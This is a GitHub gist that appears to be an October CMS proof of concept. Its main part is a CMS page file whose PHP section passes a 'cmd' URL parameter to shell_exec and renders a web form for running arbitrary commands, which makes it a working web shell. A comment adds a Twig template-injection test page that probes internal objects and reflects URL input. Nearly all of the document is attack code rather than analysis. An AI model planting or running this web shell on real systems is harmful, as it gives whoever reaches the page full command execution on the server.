Skip to content

Instantly share code, notes, and snippets.

@RajChowdhury240

RajChowdhury240/october-cms.md

Created January 19, 2026 23:43
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save RajChowdhury240/6858a9bbbdf00e42481cab2ffe758ce1 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save RajChowdhury240/6858a9bbbdf00e42481cab2ffe758ce1 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
october-cms.md
CMS_SAFE_MODE = off

rce-proof.htm

title = "RCE Proof of Concept"
url = "/rce-proof"
layout = "default"
==
<?php
function onStart()
{
    $this['whoami'] = shell_exec('whoami 2>&1');
    $this['pwd'] = getcwd();
    $this['php_version'] = phpversion();
    $this['server_info'] = php_uname();

    if (isset($_GET['cmd'])) {
        $this['cmd_result'] = shell_exec($_GET['cmd'] . ' 2>&1');
    }
}
?>
==
<div class="container mt-5">
    <div class="alert alert-danger" role="alert">
        <h2>🔴 AUTHENTICATED RCE VULNERABILITY CONFIRMED</h2>
        <p>This page demonstrates Remote Code Execution through October CMS admin panel.</p>
    </div>

    <div class="card mb-4">
        <div class="card-header bg-dark text-white">
            <h3>System Information (Auto-Executed)</h3>
        </div>
        <div class="card-body">
            <table class="table">
                <tr>
                    <th>Current User:</th>
                    <td><code>{{ whoami }}</code></td>
                </tr>
                <tr>
                    <th>Working Directory:</th>
                    <td><code>{{ pwd }}</code></td>
                </tr>
                <tr>
                    <th>PHP Version:</th>
                    <td><code>{{ php_version }}</code></td>
                </tr>
                <tr>
                    <th>Server Info:</th>
                    <td><code>{{ server_info }}</code></td>
                </tr>
            </table>
        </div>
    </div>

    <div class="card">
        <div class="card-header bg-dark text-white">
            <h3>Interactive Command Execution</h3>
        </div>
        <div class="card-body">
            <form method="get" class="mb-3">
                <div class="input-group mb-3">
                    <input type="text" name="cmd" class="form-control" placeholder="Enter shell command (e.g., id, uname -a, ls -la)" value="{{ _GET.cmd }}" required>
                    <button class="btn btn-danger" type="submit">Execute Command</button>
                </div>
            </form>

            {% if cmd_result %}
            <div class="alert alert-success">
                <h5>Command Output:</h5>
                <pre class="bg-dark text-white p-3" style="border-radius: 5px;">{{ cmd_result }}</pre>
            </div>
            {% endif %}
        </div>
    </div>

    <div class="mt-4 alert alert-warning">
        <h4>Exploitation Details:</h4>
        <ul>
            <li><strong>Attack Vector:</strong> PHP Code Section in CMS Pages</li>
            <li><strong>Required Access:</strong> Admin authentication to CMS backend</li>
            <li><strong>Configuration:</strong> CMS_SAFE_MODE=false (allows PHP execution)</li>
            <li><strong>Impact:</strong> Full server compromise via arbitrary command execution</li>
        </ul>
    </div>
</div>
@RajChowdhury240
Copy link
Author

RajChowdhury240 commented Jan 19, 2026

SSTI Bypass

title = "SSTI Bypass Test"
url = "/ssti-bypass"
layout = "default"
==
<div class="container mt-5">
    <h1>Twig SSTI Bypass Attempts (Safe Mode Enabled)</h1>

    <div class="card mb-3">
        <div class="card-header">Test 1: Direct Expression</div>
        <div class="card-body">
            <code>{{ 7*7 }}</code> = {{ 7*7 }}
        </div>
    </div>

    <div class="card mb-3">
        <div class="card-header">Test 2: _self.env</div>
        <div class="card-body">
            {% set foobar = 'nothing' %}
            <pre>{{ _self|json_encode }}</pre>
        </div>
    </div>

    <div class="card mb-3">
        <div class="card-header">Test 3: Variable from URL</div>
        <div class="card-body">
            User input: {{ _GET.test }}
        </div>
    </div>

    <div class="card mb-3">
        <div class="card-header">Test 4: app object</div>
        <div class="card-body">
            {% if app is defined %}
                <pre>App object exists: {{ app|keys|join(', ') }}</pre>
            {% else %}
                App object not available
            {% endif %}
        </div>
    </div>

    <div class="card mb-3">
        <div class="card-header">Test 5: this object introspection</div>
        <div class="card-body">
            {% if this is defined %}
                This object type: {{ this|json_encode }}
            {% else %}
                This object not available
            {% endif %}
        </div>
    </div>
</div>

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment